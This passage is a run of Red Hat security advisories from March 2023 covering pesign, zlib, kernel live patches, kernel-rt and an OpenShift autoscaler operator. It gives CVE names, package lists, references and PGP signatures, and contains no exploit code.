pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

Source:  
pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3560  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuBdzjgjWX9erEAQgOHA/7BEHsUb4+utg+YL/EZfFuUqhkHpV3Xk6z  
i14QR6Hy5kepLhwvGvv37A0U5o8x4rfPYQI+w8vzxliWPY/JXQlawK+qVNcia+xb  
1esZBTq7Pn3yfGxbbdA/nW0V0iFdeG/OnTvuyIWZXVe5RpdxMm6y3AB99xY9WM7Z  
l8QyDNfDQeNRQiZbMupF5Ie8vhnwFEmdNE1rbcBxPInqQ9KJqJNBRqPs/y5fiY9J  
IDuV/zHFGLAru9zfo0j1YxOV+vKa9FgUkgQwcqT3m39/L1qCY1j2aE0W8C9PFLcN  
nWu0qO3AChD2qMqTRxUwlag6OU8m99yXeXJD69udM91KBiAT5NwxPFZTwmodNX8p  
A9VLOuK30khSAjZKaL3jKH9V48WAEXWoIY2ncfFPovw7v7Zyv6bPq2nEIjghvlEf  
9ymb60lfH/5wm29OLbmyOGc9eO0FK1qIcarjkI8Tb+PGsLDkocN+vDy7sbr48AlR  
ZGqLy7awTvdL1G9mFR1S9WMD62jSoHP/wKBwdCHb4cxOXkGjUBMrAnbOXkWU+vkf  
Q3Pc1a6PFkzgH+TjVNYXy6aOyeHZJxCEj/FDXHo/+QauTxx/xUmryxREFjzand7Z  
8TYxpRm78DHmBPmctht+ivZ6thfrcLqtq4xMkCQEUL4PI2pWuL94GiRI3l6e/Iil  
r77PJEmt1v4=fimS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1093-01

Red Hat Security Advisory 2023-1095-01 - The zlib packages provide a general-purpose lossless data compression library that is used by many different programs. Issues addressed include a buffer over-read vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: zlib security update  
Advisory ID:       RHSA-2023:1095-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1095  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-37434  
====================================================================  
1. Summary:

An update for zlib is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The zlib packages provide a general-purpose lossless data compression  
library that is used by many different programs.

Security Fix(es):

* zlib: heap-based buffer over-read and overflow in inflate() in inflate.c  
via a large gzip header extra field (CVE-2022-37434)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

ppc64:  
zlib-1.2.7-21.el7_9.ppc.rpm  
zlib-1.2.7-21.el7_9.ppc64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64.rpm  
zlib-devel-1.2.7-21.el7_9.ppc.rpm  
zlib-devel-1.2.7-21.el7_9.ppc64.rpm

ppc64le:  
zlib-1.2.7-21.el7_9.ppc64le.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64le.rpm  
zlib-devel-1.2.7-21.el7_9.ppc64le.rpm

s390x:  
zlib-1.2.7-21.el7_9.s390.rpm  
zlib-1.2.7-21.el7_9.s390x.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390x.rpm  
zlib-devel-1.2.7-21.el7_9.s390.rpm  
zlib-devel-1.2.7-21.el7_9.s390x.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
minizip-1.2.7-21.el7_9.ppc.rpm  
minizip-1.2.7-21.el7_9.ppc64.rpm  
minizip-devel-1.2.7-21.el7_9.ppc.rpm  
minizip-devel-1.2.7-21.el7_9.ppc64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64.rpm  
zlib-static-1.2.7-21.el7_9.ppc.rpm  
zlib-static-1.2.7-21.el7_9.ppc64.rpm

ppc64le:  
minizip-1.2.7-21.el7_9.ppc64le.rpm  
minizip-devel-1.2.7-21.el7_9.ppc64le.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64le.rpm  
zlib-static-1.2.7-21.el7_9.ppc64le.rpm

s390x:  
minizip-1.2.7-21.el7_9.s390.rpm  
minizip-1.2.7-21.el7_9.s390x.rpm  
minizip-devel-1.2.7-21.el7_9.s390.rpm  
minizip-devel-1.2.7-21.el7_9.s390x.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390x.rpm  
zlib-static-1.2.7-21.el7_9.s390.rpm  
zlib-static-1.2.7-21.el7_9.s390x.rpm

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuDNzjgjWX9erEAQhBfxAAnzhxAmg+iqzHC7pYiVpoAR4rHumYqU06  
6mzA0Y2UcTuzx/baoTpN2lxDJlKcJxijzXAVFDVK/FMfxeznMSl5LziNzdc07Vb0  
rlNzQ0UXCaRAOVrHI4cWIi+XOLnwfFT+3ZzLGnIni6ZvdMroQCNJ2AlfLCeQwZ4M  
59JZeHsYMJTg2E/sgQ9KALmCA+g+XVPmjrigoEG2DSOgXS/65t0SQ0DvMDeN8nT2  
G9fWqBwDZpJcgqUTDI/5JSQ0kgENR4KLmnxbRJETHvydH+0LBlthqNSGmEWuVJYe  
/Uw/YoffoP3tDzITzJEk5PdN6Y53atG25haf7wLmKWmfWdd2sfNqIOWZN7iUrpGG  
V/pWF0kamiyrJ3CzLCr73hKWwaN3+tKyX5NlwFyKg67EwujAVS8upcGLgCCy/TDc  
VuvvK6JiXgz0ieqhfoUXLOw4blF30OnUWWe2WHNTmXxEagRWFDmcyau0+xCs6ZtI  
0e/9w8fC8qG79T8tlfM3QbYljHeyDwYRLu8S4D00eQD/KBRTren40qhDiYMjcvtQ  
hAgDKEkcDR1cKDgalHCNpEWN+WWJdQbCetrAzkqinbVnjXVtNlrVQrgQrQF8RvsA  
4vKUM3m4sedi7CblWgtPtUU4KiLNlq2oF03RjrVnW1FohuOJ8oRQ4pnb/5iZ9b1h  
huKrzrky4/I=yKEJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1095-01

Red Hat Security Advisory 2023-1103-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1103-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1103  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-4378  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_90_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_91_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_93_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_95_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_98_1-1-1.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_90_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-1.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_90_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuF9zjgjWX9erEAQiXgRAApccr26Oub6U9TlUdxdqDFprKVYzBfeDq  
G16IDPwGU+szcSUtV/+q1WS6Qg44/vLdhq8VDP960NZdxdADosvXUd9l0pDoi5Mz  
Smmntkjokf7SDtTVr0VEmGU1dxD4aWkyGmV6vYGjcYxx+/U4hFR7JLH6GRh203zV  
uY/fkJBeQjxHL+5xfeHxX4DIeO+kChSmbESl9D0I39zRt78yuZk9uuFS2jEaDvAK  
Qk9VgL8c2v/RjUZqgXU/Vf6KODryjk+SC1p7OOCt9vO6ytF2gr2C9F6VQlUt9xe2  
GPds9nZh4qPaLbRIAj3k7uYpH8TIdbJ9KflCAj1SU+J1pYZKQGuGQCyUfJAXLMF3  
MQzm9Gq9TWb4OcUV10pZRGcYKKP/hcqh2J4ssh8mOcMen9mNvi1pv8PrJJVkahCO  
1pGRLKG88XMKECTSMyRtgjwnx0yYZyZN+JuMHjX74dmglIYgqp+HKh7u2iL0NYEX  
v6DwIrG/ealgpx4DNENQmfHsr+0z7O6TQWtPNiECfyORuJG/7g1MjCMB5o1RtAgj  
LcHL8/UbuWTifCk7rJ1Z1F2cJrpJ5fHKZ922U1JDbiPtK2mBw2I/RiVbYlMzPmPF  
itlD7NMz6jaVcDR1ogNPkQnJnI4JSwvPuT2HlWLyprKBEqk3Q/VwQKiwcTg6DArC  
Piyibz2Gyrw=tAzH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1103-01

Red Hat Security Advisory 2023-1092-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1092-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1092  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-4378 CVE-2022-42703  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* kernel: use-after-free related to leaf anon_vma double reuse  
(CVE-2022-42703)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update to the latest RHEL7.9.z21 source tree (BZ#2159523)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133483 - CVE-2022-42703 kernel: use-after-free related to leaf anon_vma double reuse  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.88.1.rt56.1233.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-kvm-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-kvm-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-kvm-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-kvm-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-kvm-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-kvm-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 7):

Source:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.88.1.rt56.1233.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuCdzjgjWX9erEAQi7RBAAmp6aI76OfHJJa8HdjsKOtocLixUbqvAn  
GKMf3vPi2sArtLwZ1zKvKAwXj4xE919ogP4G5JMeMDibAVlfSQj0sl38ScLmYNL8  
VE2Fbgbzh8F4kCuAWur1BahCo2lN7DDVbcFOQ/AchWFzPQ2gyPCwAq0ERQEckiFk  
ky/vG4K660u9qth06v7dCkofYVNqEaSxOQEC8fT9tt8//MZTBuUfI8eXp00evhjA  
GnaBCD8AX4vSAs+dzUP51mbI2w/iQHXM8agMoWIkNymzbV6ZuxmRSPn9xpytPsF7  
B0qxMoXSA3kkGvayHVu4k/DOusr6LJYzd9D9AVlWjgu5PRqymhdNup5Ojseq/s8V  
WuZhjoHXJL43v9uxw0pztb09uwN5tK7QmMWmm2NEX8Uex7nx6JkKHs2Q5CZsbJNk  
g1eYQEuGSVhdmgpkK2UYny4flqErkn9ly1b6o6fci9c2XsQ4e/ydYHbZT5aZmYJJ  
Ax57Mf8mgQZiPITMF8wxpYyOvYRt8PKKGzZwBvPrWv+eqxHZPYlwmSyBkPi2+juy  
a+YAFr+65eQRTQelhf8xwH8MrUA31B8NkkeohruG76ODOhJip4JKCdMam8BAUvN0  
M7ZnMutq6a40TdG0PhJcejqaWeFTsKzxHWk0lF6l0Q92DArk/TssNUDBVamG+YKZ  
Qgqt+POQz3w=y0TD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1092-01

Red Hat Security Advisory 2023-1042-01 - Custom Metrics Autoscaler Operator for Red Hat OpenShift including security updates.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Custom Metrics Autoscaler Operator for Red Hat OpenShift (with security updates)  
Advisory ID:       RHSA-2023:1042-01  
Product:           custom-metrics-autoscaler  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1042  
Issue date:        2023-03-06  
CVE Names:         CVE-2022-1705 CVE-2022-1962 CVE-2022-2879  
                   CVE-2022-2880 CVE-2022-27664 CVE-2022-28131  
                   CVE-2022-28327 CVE-2022-30630 CVE-2022-30631  
                   CVE-2022-30632 CVE-2022-30633 CVE-2022-30635  
                   CVE-2022-32148 CVE-2022-32149 CVE-2022-41715  
====================================================================  
1. Summary:

Custom Metrics Autoscaler Operator for Red Hat OpenShift including security  
updates.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The Custom Metrics Autoscaler Operator for Red Hat OpenShift is an optional  
operator, based on the Kubernetes Event Driven Autoscaler (KEDA), that  
allows workloads to be scaled using additional metrics sources other than  
pod metrics.  
This release builds upon updated compiler, runtime library, and base images  
for the purpose of resolving any potential security issues present in  
previous toolset versions.

This version makes use of newer tools and libraries to address the  
following issues:  
golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)  
golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)  
golang: archive/tar: unbounded memory consumption when reading headers  
(CVE-2022-2879)  
golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)  
golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)  
golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)  
golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)  
golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)  
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)  
golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)  
golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)  
golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)  
golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For  
not working (CVE-2022-32148)  
golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time  
to parse complex tags (CVE-2022-32149)  
golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2100763 - No space to specify operator.logLevel from Form view when create KedaController  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip  
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal  
2113945 - Icon of Custom Metrics Autoscaler is blurry on operatorhub  
2118404 - Wrong GitHub link for Custom Metrics Autoscaler in OperatorHub  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers  
